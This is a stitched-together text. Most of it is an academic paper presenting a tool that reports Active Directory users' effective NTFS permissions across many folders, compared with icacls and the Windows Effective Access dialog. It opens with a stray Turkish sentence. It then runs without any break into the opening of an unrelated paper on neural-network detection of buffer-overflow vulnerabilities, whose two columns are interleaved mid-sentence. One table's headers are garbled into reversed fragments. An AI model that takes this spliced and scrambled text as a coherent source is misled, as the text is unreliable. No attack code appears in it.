Bu yaklaşım, diğer kaynakları ve diğer yerel veya aktif dizin nesnelerini incelemek için kolaylıkla genişletilebilir. An Inverse Approach to Windows' Resource-Based Permission Mechanism for Access Permission Vulnerability Detection Research Article ABSTRACT Article History: In organizations, employees work with information stored in files according to Received: 08.12.2021 their duties and responsibilities. Windows uses resource-based access Accepted: 10.01.2022 permissions that any permission for any user has to be set separately per Published online: 18.07. 2022 resource. This method gets complicated as the number of resources and users increases, and causes oversights in assigning permissions. Therefore, a special Keywords: mechanism is required to scrutinize what permissions any employee has on any Active directory users Windows Server set of resources. This requirement is circumvented by reversing Windows‘ Access permissions approach in terms of user-accessible resources. This approach is implemented Security vulnerability by a program allowing quick and easy examination and reporting of any type Inspection of permissions granted or denied to active directory users on any number of Reporting folders. According to our surveys, this is the first time that such a tool accomplishing above mentioned tasks in a different way than Windows‘ built- in tools have been developed. The proposed method enables administrators to make sure there is no missing or overlooked setting that could cause a security vulnerability. This approach can easily be extended to scrutinize other resources, and for other local or active directory objects. 534To Cite: Temiz H., Büyükeke A. An Inverse Approach to Windows' Resource-Based Permission Mechanism for Access Permission Vulnerability Detection. Osmaniye Korkut Ata Üniversitesi Fen Bilimleri Enstitüsü Dergisi 2022; 5(2): 534-550. 1. Introduction It is obvious that, in an organization, users should not have access to any resources not matching their roles and privileges. They may either intentionally or unintentionally collect sensitive information of the company from files and folders, or even going further, corrupt, delete or alter them. Although accidents can and shall happen occasionally, they are often more striking in their effect when caused by administrators. So, administrators have to be more careful to grant or deny permissions to Active Directory (AD) users, groups or services on the resources. The issues in accessing files or folders are frequently caused by underlying recent modifications, especially denied rights via groups or altered permissions on parent folders (NTFS, 2021). Thus, it is very important to conserve a structured folder hierarchy, especially in a large environment with many users and groups. As the number of users and sources (e.g., files, folders) increases, it gets harder and becomes more complex for administrators to keep access rights under control and to verify everything is okay. Monitoring also becomes more difficult accordingly. After a certain point, oversights and omissions begin in assigning access rights. This leads to unexpected and uncontrollable consequences in accessing resources by users. The Graphical User Interface (GUI) is Windows' primary mechanism for assigning access permissions, though there are also few command-line tools (e.g., icacls) each serving a specific purpose and not easy to use. These tools are not user friendly as they contain not any GUI. In windows, GUI remains as the first option for administrators to grant, deny and check access
permissions on the resources (e.g. folders). However, GUI only allows setting permissions on a particular securable object (SO) and its subfolders via inheritance, if it is a folder. Thus, each SO (e.g., a file, folder, registry key, service or printer) has to be processed individually through GUI. So, scrutinizing what permissions are granted or denied to any user or group on a list of files or folders turns into a very difficult, cumbersome, and time-consuming job with this GUI. On the other hand, administrators often need to check whether any inappropriate permissions have been granted or denied to a user or group on a set of files or folders. The only way of doing such a task, for example, for multiple folders, is to inspect permission entries via this GUI for each. It is not possible to investigate the access permissions for a single or multiple users or groups on multiple folder or files with a single click. On top of it, the number of SOs can reach tens of thousands. Not any such means exists in GUI to process multiple resources in this manner. Lack of such means makes this job overwhelming, time- consuming and error-prone. Therefore, administrators are forced to fail to properly assign permissions. This article presents a novel approach that addresses the effective access permissions of active directory users in the form of user-based rather than resource-based as Windows addresses. A program is developed to implement this approach. It is tested on a network environment managed by Windows 535Server 2012 operating system. It is shown that this approach allows to easily and quickly examine and report any number of permissions allowed or denied to any number of users on any number of folders. With this approach, administrators can seamlessly check if there is any missing or overlooked setting that could cause a security vulnerability by inspecting the active access status of AD users to multiple folders. In this way, administrators of the information technology (IT) department of companies do not waste their valuable time, and can focus on other duties. This approach can be applied for other active directories or local objects with a slight modification to the program. 2. Related Works Administrators of IT departments of companies have many tasks to do in daily routines: network security, license management, antivirus, firewalls, backups, software installation and update, recovery, user support, monitoring, user accounts and permissions, file organization and management, shared folders and so on. Each is very important. Companies use Microsoft's AD to centrally manage and organize many of the above-mentioned tasks and company resources (Binduf et al., 2018). In a typical network, users work with or generate precious information contained in shared files and folders. Every local or AD user, (groups and services as well) should be able to access resources related to their role with appropriate rights and not access other irrelevant resources. Therefore, they must have the appropriate permissions (grants or denials) for these resources, but not more than necessary. This is really critical for mitigating information leakage, data loss (e.g., accidental deletion) and so on. That's why administrators put a lot of effort into assigning rights to users. In Windows, the security tab in the properties dialog of SOs is the main checkpoint for setting permissions on the resources. Users or groups are authorized or denied certain access roles on a per- resource basis. This means that, for example, each folder has to be handled individually by administrators through this GUI, unless using command-line tools. On the other hand, it is really significant for administrators to make sure permissions are set appropriately on multiple folders: users can access resources they need to reach with proper rights and cannot access the ones they shouldn't. In fact, the effective access tab of the advanced security settings dialog box, shown in Figure 1, opened by clicking ―Advanced‖ button in the security tab of the properties window is designed to scrutinize a user‘s (or group‘s) access permissions on a single SO. However, this tool only allows processing a single object at a time. The entire process has to be done iteratively, going through all these dialog boxes for each SO. Conversely, there is no simple and easy way to inspect what kind of access permissions certain users possess on multiple folders, due to the non-existence of such means. To our best knowledge, there is no such tool that makes up for the deficiency of such a mechanism. Rather, some few command-line tools exist for manipulating access permissions. The first tool that comes to mind is Windows' command line tool, icacls, the successor to the WinNT tool cacls. It runs in command prompt, and is used for displaying or modifying access permissions of files or folders. However, working with it is not so easy since it doesn't have a GUI and requires to learn many of its 536parameters. In addition, it's not possible to simply get the results in an easily reviewable format, and implement inspections for multiple users and folders. Though it cannot meet the objectives outlined in this article, we demonstrated its output format and deficiencies in the experiments detailed in section 5. Figure 1. Advanced security settings window to examine the effective access permissions assigned to a user or group on a resource. Sung and Yoon developed a command-line tool in Windows XP environment to secure a single file at a time by assigning desired permissions on it (Sung and Yoon, 2012). Therefore, it does not allow to inspect or check permissions on files or folders, and lacks a GUI. In addition it works only desktop operating system, thus, can only set permissions for local users – Active Directory (AD) users cannot be handled. Another command-line tool is the ACACLS (Cone, 2003). Besides it mimics the operation of WinNT tool cacls, ACACLS has several additional features to extend cacls‘ functionality. It aimed to edit existing security lists of files and folders, and to manipulate the inheritance flags of files and directories directly. The limitations of Windows‘s API hindered to fully achieving the second goal.
Nevertheless, it is not designed for inspection or reporting the effective permissions. Rather, it allows to set permission with its scripting interface. In addition, it is developed to run only for the users on a local computer, and therefore, it cannot run in a domain environment. Conversely, there is no such tool devised to check effective access permission (EAPs) on SOs of Windows. This gap is filled with new software that implements the approach introduced in this article. It provides administrators an easy and simple way of checking the EAPs of users on multiple folders, with its GUI. 5373. Windows File and Folder Security The following subsections provide detailed information on the concepts and components of Windows regarding security including file system, access permission mechanisms. 3.1. Access Permission Mechanism Windows uses two types of security for access control: role-based and Access Control Lists ACL- based. Role-based security is a form of user level security where a server focuses on a logical role of a user rather than focusing on his or her identity. This is simply and commonly implemented with groups that are either local or AD. As opposed to role-based security, ACL-based security focuses more on objects rather than on users. Each SO has its own access control policy represented by a list of permission entries stored in an ACL. It comes with more complexity than role-based system, as typically millions of objects, each with its own ACL, exist in an operating system. The management of this complexity is simplified by inheritance (Brown, 2004). Access permissions can be assigned one of two ways: explicitly or by inheritance. Explicit permissions are assigned by default when the object is first created, or by user action, whereas inherited ones are given to an object since it is a child of a parent object. Objects inherit all access permissions designated to their containers. If no access is specifically granted or denied, users or groups are denied access (Microsoft, 2009). The precedence hierarchy for the permissions can be summarized as follows -higher precedence permissions are given at the top of the list (Mueller, 2008): • Explicit Deny • Explicit Allow • Inherited Deny • Inherited Allow The restrictive permissions override lenient permissions. ACLs allow to set the permissions on files or folders for specific groups or users. ACLs enumerate who (users or groups) has what kind of access (or denials) to certain objects. There are two chief ACL groups: Discretionary Access Control List (DACL) and Security Access Control List (SACL). SACL handles Windows auditing features, whereas The DACL contains a list of access rights granted or denied to certain users or groups on SOs (Microsoft, 2021c). ACLs convey Access Control Entries (ACEs) that delineate security rights for a user or group. Every typical ACE possesses a header, access mask and security identifier (SID). A SID is a unique value of variable length that is used to identify an individual or group (Microsoft, 2021d). The header defines the type, size, and flags. The access mask specifies the rights that users or groups have to the objects. Inheritance flags in an ACE control how the ACE is to be propagated to the child objects. Each SO has a security descriptor (SD) that contains all security information related to accessing control for that object. This structure is used to set and query an object's security status. Whenever an 538object is accessed, its SD is compared to the permissions of accessing user or group to verify that the requested access is allowed. An SD typically includes the following items (Microsoft, 2021b): • SID of the owner • SID of primary group • A DACL • A SACL • Qualifiers for the preceding items The decision to grant or deny access to an SO is made based on the access rights stored in the ACEs in its DACL. When a user‘s SID matches a specific ACE, ACE is checked to determine if the access type is Allow or Deny. (Microsoft, 2021a) In this process, ACEs are examined in order. As soon as the security system confirms that all requested access entities are granted or that any of them is denied, it yields success in the former case and a failure in the latter. 3.2. NTFS and Permission Types The primary file system of Windows is the NTFS (New Technology File System). There is also a newer Resilient File System (ReFS) suggested for use in Storage Spaces, designed as cost-effective platform maximizing data integrity and availability of very large data sets, as of Windows Server 2012 version. NTFS offers a full set of features covering security descriptors, disk quotas, encryption, and rich metadata, and so on. It can be exploited with Cluster Shared Volumes (CSV) to ensure constantly available volumes which can be accessed concurrently from numerous nodes of a failover cluster (Microsoft, 2017). Windows Server 2012 supports volumes as large as 256 TB depending on the cluster size that can be up to 232-1. NTFS has very robust security features that can be even much higher levels with BitLocker Drive Encryption. NTFS permissions are set to an SO through ACEs in its ACL (NTFS, 2021). They are logically grouped into six basic permissions, each of which is contained a definite set of advanced (special) permissions. These groups make it easier to set complimentary permissions to users or groups (Stanek, 2008). The entire set of permissions is given in Table 1. Access rights can be changed in the security tab, as shown in Figure 2, in the properties dialog box opened by selecting the properties option from the pop-up menu appearing when right-clicking on a file or folder. 539Figure 2. Security tab to configure permissions for a file or folder. This screen provides only superficial (not detailed) information of security permissions for a single resource only. Table 1. Special permissions for folders Permission Full Control Modify Read & Execute List Folder Contents Read Write Traverse Folder / Execute File     List Folder / Read Data      Read Attributes      Read Extended Attributes      Create Files / Write Data    Create Folders / Append Data    Write Attributes    Write Extended Attributes    Delete Subfolders and Files  Delete   Read Permissions       Change Permissions  Take Ownership 4. Proposed Work Windows focuses on SOs rather than users or groups due to the adoption of ACL-based roles in security permissions. Therefore, access permissions are set individually for each user (except
inheritance) on each SO. That is, each time only a single SO can be processed unless there is a program or script dedicated to accomplishing this task. Unfortunately, Windows lacks such a tool that simplifying or facilitating the inspection of EAPs on multiple SOs. Such a task can be accomplished only by developing a special program carefully designed to scrutinize the DACLs of SOs (folders in our case) and report the results in a GUI. Even if it is necessary, results 540can be recorded in files in any desired format. However, the main purpose of this study is to enable administrators to inspect EAPs in an easy, fast and simple way. This goal is achieved by listing all results in a neat GUI that showing each access type and status (grant or deny) assigned to objects for each user. It is clear that the further functionalities can be included to the program as needed or desired. Our approach is to recursively traverse the folders and check their ACLs for certain users and permissions being scrutinized. The user can select a single or multiple users from AD, and specify any combination of permission types. The program allows to choose a single folder or multiple folders located within a root folder. It is useful to be able to select multiple folders in a particular location in this way because the folders accessed by network users are usually gathered in a root folder. Certain users are then assigned certain access permissions on specific folders based on their role in the organization. The pseudocode of the algorithm is given below: Algorithm to scrutinize effective access permissions Inputs: Users: list of active directory users selected from the program Folders: path of folders in the root folder selected from the program Permissions: list of access permissions to be inspected for each user on each folder Output: Table: a data table in tabular format with each row stores True or False for each permission for a user on a folder For each user in Users For each folder in Folders Insert a row into Table with related columns // (user, folder, and permissions) For each permission in Permissions For each ACE in folder‘s ACL If ACE belongs to user OR a group of which user is member If ACE contains the permission AND its type is ―Allow‖ Set True in the permission column Else Set False in the permission column Else Set False in the permission column Return Table Entire process is very straight. But there are some difficulties in the implementation of this approach because the some feature lack in Windows API. Namely, an ACEs in ACL of a folder may belong either a user or group. If the SID of the ACE is identical to the SID of the user whose permissions are being inspected, we know that that ACE data belongs to that user. We then only check the ACE for the permissions we are inspecting. Otherwise, we need to find out whether the ACE belongs to a group via its SID, and if so, make sure the user is a member of that group to continue further inspections for permissions. Nevertheless, Windows API does not provide a simple mechanism to designate if a SID belongs to a group, or the user is in a role of a group. This issue was overcome with the development of a sub-module that detects membership status by repeatedly checking the members of AD groups. 5414.1. Implementation Thanks to Microsoft‘s .NET framework, many things get much easier than programming with native Windows‘ API written in low level C++ language. Though it is still required to refer to native libraries for specific tasks from time to time, the .NET elegantly wraps the main important fractions of the functionality of native APIs. As of version 2.0, the .NET framework introduced a new namespace that brings access control programming to the managed C++ API world. Compared to native programming with C++ language, it is simplified very neatly by introducing new methods and classes in the .NET framework. The program is developed with Microsoft Visual Studio 2015 version using C# language. It is built to run on the .NET framework 4.5 version. However, it can also run on future versions of the .NET framework, provided it is recompiled for the targeted version. For this purpose, it may require a little tweaking to adapt it to the new versions. The program is tested on Windows Server 2012 version with AD on it within a small-scale network which is established with virtualization technology. The .NET framework provides a wealth of namespaces dedicated to working on certain tasks or technology from desktop to web applications. Each namespace contains a number of classes, methods and other programming elements for a specific scope. This study required to work on AD services, security principles and folder security entries. The details of the main namespaces used for the program are given in Table 2 (Halsey and Bettany, 2015). Table 2. Details of the main namespaces used in the program, which provide basic programming components to perform the tasks related to AD users and access permissions Namespace Remarks System.Security.AccessControl Contains a number of programming elements to manage access control and security-related auditing actions on SOs. The FileSystemSecurity class from this namespace is mainly used to fetch folders‘ security entries. System.Directory Services. Account Provides a uniform access and management of user, computer, and Management group security principals through the multiple principal stores such as AD domain services, AD lightweight directory services, and Machine security account manager. System.DirectoryServices Offers easy access to AD Domain Services from managed code. The namespace covers two different classes: DirectorySearcher and DirectoryEntry. A DirectoryEntry object is constructed to access our Domain and passed to DirectorySearcher class to obtain AD users. System.Security.Principal Defines the principal object representing the security context under which code is running. Each user are fetched from AD as a Principal object, then, their SIDs are searched in folder‘s ACEs. System.IO Allows to read and write to files and data streams, and elementary file and directory support. This namespace is used for typical file and folder operations and to get ACEs of folders with the GetAccessControl method of the Directory() class. 542The other base namespaces and classes that are used as core components to develop an application, such as the System.Windows.Forms namespace that used to create the main window of the program, are not mentioned since they are well known. Only the technologies required for the implementation of this particular task are detailed.
The main windows of the program is presented in Figure . The program has two list boxes, one of which lists AD users and the other access types to inspect. Each item in the lists is shown with a checkbox that can be selected individually. Any combination of the items in these lists can be selected. By ticking the checkbox ―Select All‖, all items in a list can be selected or de-selected vice versa. The current folder path is shown next to ―Path‖ text. Users can change the current location by the ―Folder Browser‖ dialog opened when clicking ―Change‖ button. The ―Inspect‖ button kicks inspection process with given settings. The results are given in a tabular format that each row shows a user's rights to a folder for given access permission types. Each column of access types displays Yes or No to indicate that the user is allowed or denied for the relevant access, respectively. The results can be sorted according to any column in ascending or descending order by just clicking the header of the relevant column. In this way, an administrator can easily examine if the permissions are set properly or not. He or she then be sure that everything is okay, or, takes necessary actions to remedy issues specific to access permissions in case of any overlooked or inappropriate security assignment to users. Entire results can be stored in an Excel file by clicking the ‗Save‘ button. With this feature, administrators can store access information for later use, further analyze the data using Excel‘s advanced filtering features, or keep them as a snapshot of settings at a certain time. We have confirmed through our experiments that our tool correctly identifies the access permissions. For this purpose, we compared the results obtained with the Windows GUI tool (effective access tab) with the results obtained from our tool. We observed that both tools produced exactly the same results. 5. Experiment We established an experiment to demonstrate the impact of our approach. For the experiment we created 10 individual folders under the path C:\Library by assigning each of them a few different permission settings. We created 6 users in our AD environment: User-A, User-B, User-C, User-D, User-E and User-F. We compared our approach with the icacls command-line tool and the GUI tool of Windows located in the Effective Access tab in the Advanced Security Settings dialog. We measured the completion time only for the Effective Access dialog and our program since it is not possible to accomplish the similar task with the icacls for a reasonable time. We benchmarked these three tools in various aspects in the last part of this section. The following sub-sections present the experiments accomplished with each tool. 5435.1. Experiment with icacls In this section, we show how and to what extent an administrator can exploit the icacls.exe tool to check access permissions. As discussed earlier, it is a command-line tool that lists results in some sort of structured text with indentations and uses a special abbreviation for each permission type. Below, we pasted in a snippet of the results when we issued ―C:\icacls c:\library\* /t‖ for the library folder located at the root of C: drive. The t parameter is issued to perform the query for subdirectories. … c:\library\Accounts Coruh\Sample Group:(I)(OI)(CI)(DENY)(R) Coruh\userc:(I)(OI)(CI)(DENY)(R) Everyone:(I)(OI)(CI)(RX) Coruh\guess:(I)(OI)(CI)(F) Coruh\Sample Group:(I)(OI)(CI)(W) Coruh\usera:(I)(OI)(CI)(F) c:\library\Archive Coruh\Sample Group:(I)(OI)(CI)(DENY)(R) Coruh\userc:(I)(OI)(CI)(DENY)(R) Everyone:(I)(OI)(CI)(RX) Coruh\guess:(I)(OI)(CI)(F) Coruh\Sample Group:(I)(OI)(CI)(W) Coruh\userb:(I)(OI)(CI)(F) … The icacls tool displays or modifies the access permissions with DACLs assigned directly to users or groups on a resource (SO). Each individual permission entry is given with its abbreviation in parenthesis. E.g., (I) and (F) denote the permissions ―inherited‖ and ―full access‖, respectively. In brief, these abbreviations denote the permission types given in Table 1, and information about their inheritance status with the letter I. Since it is more technical, domain-specific, and out of the scope of this paper, we keep this information short and concise, and note that interested readers should refer to (Microsoft, 2021c) for further detailed explanations. Each permission entry explicitly assigned to a particular folder is given in the indented rows below the line where the folder path is written. It's good practice to group users in the same department and/or in the same role into specific groups, and that's how it's usually done. In this way, the operation and management of IT resources are simplified. Access permissions are assigned to groups rather than users unless required. Especially when it is requested to grant/deny a certain access right to a certain user, the relevant regulation is made only for that user. Given a particular user's access rights are not explicitly assigned for a resource, the only way to resolve the rights of that user is to examine the rights assigned to the groups that that person is a member of. For example, in the last line, it is seen that some permission (I, OI, CI, and F) are 544explicitly given to ―User-A‖. But what about other users (even more, groups that are members of other groups)? Their access rights are ambiguous, even though there is some preliminary information known by every administrator, e.g., all users are members of the ―everyone‖ group, since they cannot make sure the membership status of a particular user for groups given in DACLs. When an administrator tries to examine the permissions (either, grant or deny) for a particular user (and even in more detail), let us say the User-B, he or she has to check the membership status of User-B recursively for each
group given in DACL entry to resolve the inherited rights or denies as described in section 3.1. In summary, it is far beyond being hard to resolve the detailed information with icacls per user. When it comes to performing such a task for multiple users and resources, no way! However, in fairness, we must state that the icacls is a very useful tool for administrators to set permissions with scripts but not for tasks of which aimed at this paper. 5.2. Experiment with GUI Tool Another way to check access rights of users on particular resources is the Windows GUI served in the Effective Access tab in the Advanced Security Settings dialog, as described in detail in the sections 2 and 3.2. This dialog graphically displays a detailed list for the rights and denies for a particular user on the resource that is right-clicked to open this dialog. The screen output of this tool for the inspection performed for User-B on the Projects folder is given in Figure 3. Detailed output of GUI (effective access tab) when inspection is performed for User-B on the Projects folder. . 545Figure 3. Detailed output of GUI (effective access tab) when inspection is performed for User-B on the Projects folder. To be honest, this dialog box presents the user's access rights in a very neat and detailed way. But only for a single user at a time. One can choose only a single AD or local user each time to display effective rights of that user on the resource. So, it does not provide any means to perform an examination for multiple users and on multiple resources in one go, and export the displayed information in any format. Therefore, performing multiple inspections would turn out to be a very time-consuming, annoying and error-prone task. Given that hundreds of users and many resources exist in organizations, it is not possible to perform such tasks with this tool, as it will take days. In order to get readers to imagine how long it would take, we asked three administrators to perform our experiment as described at the beginning of this section, and measure the elapsed time. We also asked them to fill the table in the form as yielded by our program given in Table 3. We then averaged their completion times. The average completion time for a single user and 10 folders was 14.47 minutes. If the number of folders remains the same and there were a hundred users, it would take 1447 minutes, in other words, more than 3 business days. However, the number of folders and even users are often many times higher than the numbers assumed in our experience. The burden this task imposes on the IT department can easily be imagined given the dynamic work environment of IT due to changes in employee roles, entitlements, and even leave and hiring. 5465.3. Experiment with Proposed Tool We repeated the same experiment with our tool as well. But this time for more users. In this case, each folder located under the path ―C:\library‖ are inspected for AD users User-A, User-B, User-C and User-D for all permission types. The output of our tool is demonstrated in Figure 4. Figure 4. Main window of the program and its detailed output when inspection is performed for users User-A, User-B, User-C and User-D on the sub folders of the path C:\Library. Our tool produces the outputs in a tabular format, which is not possible to obtain with prior discussed Windows‘ tools. It is very easy with proposed to produce such a detailed report with just few clicks without manual typing, repeating the procedure for multiple users or resources, and so on. Besides diagnosing the results on the display, it is possible to export all reported data to an Excel file. We present in Table 3 a fragment of the report saved in an Excel file for User-B obtained in this experiment. In total, 19 distinct entry info gathered by the tool for each folder and user are presented in a separate columns. If a user has an access right for given permission type, it is denoted as ‗Yes‘ in the relevant column, otherwise as ‗No‘. The completion time of our tool is averaged since in the previous experiment the completion time was calculated for one user and for this time four users. The average completion time for 1 user and 10 sub folders is approximately 13 seconds. This is very impressive compared to the completion times of Windows‘ tools, and considering that there is no need for any manual or repetitive operation to complete the task. 547Table 3. A fragment of the detailed output of our program written in an Excel file. s e liF User Directory y r o tc e r iD ts iL a ta D e tir W a ta D d n e p p A s e tu b ir ttA d e d n e tx E d a e R s e tu b ir ttA d e d n e tx E e tir W e s r e v a r T d n A s e ir o tc e r id b u S e te le D s e tu b ir ttA d a e R s e tu b ir ttA e tir W e tir W e te le D s n o is s im r e P d a e R d a e R tu c e x E d n A d a e Re y f id o M s n o is s im r e P e g n a h C p ih s r e n w O e k a T e z in o r h c n y S lo r tn o C llu F … User-B C:\Library\Accounts No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Archive No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Finance No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\HR No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Management No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Meetings No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Projects No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\R&D No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Surveys No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No User-B C:\Library\Working No Yes Yes No Yes Yes No No Yes Yes No No No Yes No No No Yes No … As a last, we present in Table 4 the comparisons of the tools in terms of operation type, completion time, usability, elaboration, basis and reporting capabilities. Operation indicates if the entire process is
accomplished automatically without any user intervention or manually in a repetitive manner. Elaboration means whether the tools give a detailed result or not. Table 4. Comparison of our approach with Windows‘ command-line and GUI tools. Completion times are computed for a single user and 10 folders. Method Operation Completion Usability Elaboration Based on Reporting Proposed Automatic 13 seconds Very easy Yes User Excel Windows GUI Manual 14.47 minutes Not easy Yes Resource No icacls Manual N/A Too far from easy No Resource No As can be seen from the table, the proposed program is superior to the Windows‘ built-in tools in every respect and provides all kinds of features that these tools cannot provide on their own. It enables access permission inspection to be done much more successfully than Windows can offer, in a short time and with detailed reporting. 5486. Discussion and Conclusion In their busy day-to-day work, administrators of IT departments of organizations have to deal with orchestrating users' access to various network resources. It is a very important requirement for them to ensure that the effective access permissions granted or denied to users are appropriate and that there are no vulnerabilities in network security. Windows offers a resource-based access mechanism that makes it possible to check users who have access to a resource on a resource basis (but individually, not collectively). However, being able to list all resources that a user can or cannot access with certain permission types is something needed by administrators to ensure network security. But Windows does not provide such a mechanism to easily and quickly examine the resources accessed on a user basis, together with their access types (grant or denial). By considering the resource-based access permissions mechanism of Windows from the opposite perspective as user-based access, the proposed approach allowed administrators to examine whether there are any security vulnerabilities in the access permissions assigned to users on multiple resources. In the approach, access permission information is programmatically collected from the resources is transformed into a form of user-based access permission information. With this approach any overlooked, missing, or lenient settings in the assignment of access permissions can easily be found. As far as we know, a tool that allows detailed inspection and reporting of access permissions in a different way than the existing tools provided by Windows has been developed for the first time. The program allows inspection access rights of any number of AD users on multiple folders in a fast, simple and detailed fashion. The inspections can be done for any combination of access permissions. The experimental studies have revealed that the program will provide a great convenience to administrators in verifying access permissions. Although this approach has been implemented only for AD users' access permissions to folders, it can be applied to groups and other SOs (e.g. individual files). If necessary, the capabilities of the program can be improved with a few minor adjustments. For example, changing security settings from the GUI, or storing the inspection results in files and so on. Such features can be included in the program through relevant libraries and modules provided in Microsoft .NET framework. Such features can be easily incorporated into the program through the corresponding libraries and modules. Conflict of Interest Statement The authors of the article declare that there is no conflict of interest. Author Contribution Statements The authors declare that they have contributed equally to the article. 549References Binduf A., Alamoudi HO., Balahmar H., Alshamrani S., Al-Omar H., Nagy N. Active directory and related aspects of security. In 2018 21st Saudi Computer Society National Computer Conference (NCC) 2018; 4474-4479. Brown K. The. NET Developer‘s Guide to Windows Security (Microsoft Net Development Series. Addison-Wesley Professional. 2004. Cone JM. ACACLS: A tool for examining and modifying file and directory security on NTFS volumes in a Windows NT environment. California State University, Long Beach, 2003. Halsey M., Bettany A. Restoring files and folder security settings. Windows File System Troubleshooting. Berkeley, CA: Apress 2015. Microsoft. File and Folder Permissions. Microsoft Documentation. Retrieved August 24, 2021, from https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000- server/bb727008(v=technet.10)?redirectedfrom=MSDN, 2009, September 12. Microsoft. (2017, April 5). NTFS Overview. Microsoft Documentation. Retrieved August 11, 2021, from https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012- r2-and-2012/dn466522(v=ws.11) Microsoft. (2021a, July 1). DACLs and ACEs. Microsoft Documentation. Retrieved August 27, 2021, from https://docs.microsoft.com/en-us/windows/win32/secauthz/dacls-and-aces Microsoft. (2021b, July 1). File Security and Access Rights. Microsoft Documentation. Retrieved August 26, 2021, from https://docs.microsoft.com/en-us/windows/win32/fileio/file-security- and-access-rights Microsoft. (2021c, September 27). icacls. Microsoft Documentation. Retrieved January 8, 2022, from https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls Microsoft. (2021d, February 04). Security Descriptor Structure. Retrieved August 28, 2021, from https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-security descriptor. Mueller JP. Administering Windows server 2008 server core. John Wiley & Sons. 2008. NTFS. Troubleshooting access to files and shared folders. NTFS — New Technology File System. Retrieved August 21, 2021, from https://www.ntfs.com/ntfs-permissions-troubleshooting.htm Stanek W. Windows Server 2008 inside out. Pearson Education 2008. Sung K., Yoon H. Implementation of file security module using on windows. Journal of the Korea Society of Computer and Information 2005; 10(2): 105–112. 550
2306.07981 Feature Engineering-Based Detection of Buffer Overflow Vulnerability in Source Code Using Neural Networks Mst Shapna Akter1, Hossain Shahriar2, Juan Rodriguez Cardenas3, Sheikh Iqbal Ahamed4, and Alfredo Cuzzocrea5 1Department of Computer Science, Kennesaw State University, USA 2Department of Information Technology, Kennesaw State University, USA 3Department of Information Technology, Kennesaw State University, USA 4Department of Computer Science, Marquette University, USA 5iDEA Lab, University of Calabria, Rende, Italy Abstract—One of the most significant challenges in the field represents the greatest proportion of software vulnerabilities in of software code auditing is the presence of vulnerabilities in at least three years, accounting for 41.8% [3]. Furthermore, software source code. Every year, more and more software flaws according to a Frost and Sullivan analysis released in 2018, are discovered, either internally in proprietary code or publicly severe and high severity vulnerabilities increased from 693 in disclosed. These flaws are highly likely to be exploited and can lead to system compromise, data leakage, or denial of service. 2016 to 929 in 2017, with Google Project Zero coming in To create a large-scale machine learning system for function-level second place in terms of disclosing such flaws. On August 14, vulnerability identification, we utilized a sizable dataset of C and 2019, Intel issued a warning about a high-severity vulnerability C++ open-source code containing millions of functions with poten- in the software it uses to identify the specifications of Intel tial buffer overflow exploits. We have developed an efficient and processors in Windows PCs [4]. The paper claims that these scalable vulnerability detection method based on neural network models that learn features extracted from the source codes. The defects, including information leaking and denial of service source code is first converted into an intermediate representation assaults, might substantially affect software systems. Although to remove unnecessary components and shorten dependencies. We the company issued an update to remedy the problems, attack- maintain the semantic and syntactic information using state-of- ers can still use these vulnerabilities to escalate their privileges the-art word embedding algorithms such as GloVe and fastText. on a machine that has already been compromised. In June The embedded vectors are subsequently fed into neural networks such as LSTM, BiLSTM, LSTM-Autoencoder, word2vec, BERT, 2021, a vulnerability in the Windows Print Spooler service and GPT-2 to classify the possible vulnerabilities. Furthermore, was discovered that allowed attackers to execute code remotely. we have proposed a neural network model that can overcome The vulnerability, known as PrintNightmare, was caused by a issues associated with traditional neural networks. We have used buffer overflow and affected multiple versions of Windows in evaluation metrics such as F1 score, precision, recall, accuracy, 2021 [5]. Microsoft released a patch to address the issue, but and total execution time to measure the performance. We have conducted a comparative analysis between results derived from reports later emerged that the patch was incomplete and still features containing a minimal text representation and semantic left systems vulnerable. and syntactic information. We have found that all neural network To reduce losses, early vulnerability detection is a good models provide higher accuracy when we use semantic and syntac- tic information as features. However, this approach requires more technique. The proliferation of open-source software and code execution time due to the added complexity of the word embed- reuse makes these vulnerabilities susceptible to rapid propaga- ding algorithm. Moreover, our proposed model provides higher tion. Source code analysis tools are already available; however, accuracy than LSTM, BiLSTM, LSTM-Autoencoder, word2vec they often only identify a small subset of potential problems and BERT models, and the same accuracy as the GPT-2 model based on pre-established rules. Software vulnerabilities can be with greater efficiency. found using a technique called vulnerability detection. Con- Keywords: Cyber Security; Vulnerability Detection; Neural ventional vulnerability detection employs static and dynamic Networks; Feature Extraction; techniques [6]. Static approaches evaluate source code or exe- cutable code without launching any programs, such as data flow I. INTRODUCTION analysis, symbol execution [7], and theorem proving [8]. Static Security in the digital realm is becoming increasingly im- approaches can be used early in software development and have portant, but there is a significant threat to cyberspace from excellent coverage rates, but they have a significant false pos- invasion. Attackers can breach systems and applications due to itive rate. By executing the program, dynamic approaches like security vulnerabilities caused by hidden software defects. In- fuzzy testing and dynamic symbol execution can confirm or ternally, proprietary programming contains thousands of these ascertain the nature of the software. Dynamic methods depend flaws each year [1]. For example, the ransomware Wannacry on the coverage of test cases, which results in a low recall swept the globe by using a flaw in the Windows server mes- despite their low false positive rate and ease of implementation. sage block protocol [2]. According to the Microsoft Security The advancement of machine learning technology incorporates Response Center, there was an industry-wide surge in high- new approaches to address the limitations of conventional severity vulnerabilities of 41.7% in the first half of 2015. This approaches. One of the key research directions is to developintelligent source code-based vulnerability detection systems. It successfully used for classifying software security activities can be divided into three categories: using software engineering like malware, ransomware, and network intrusion detection.
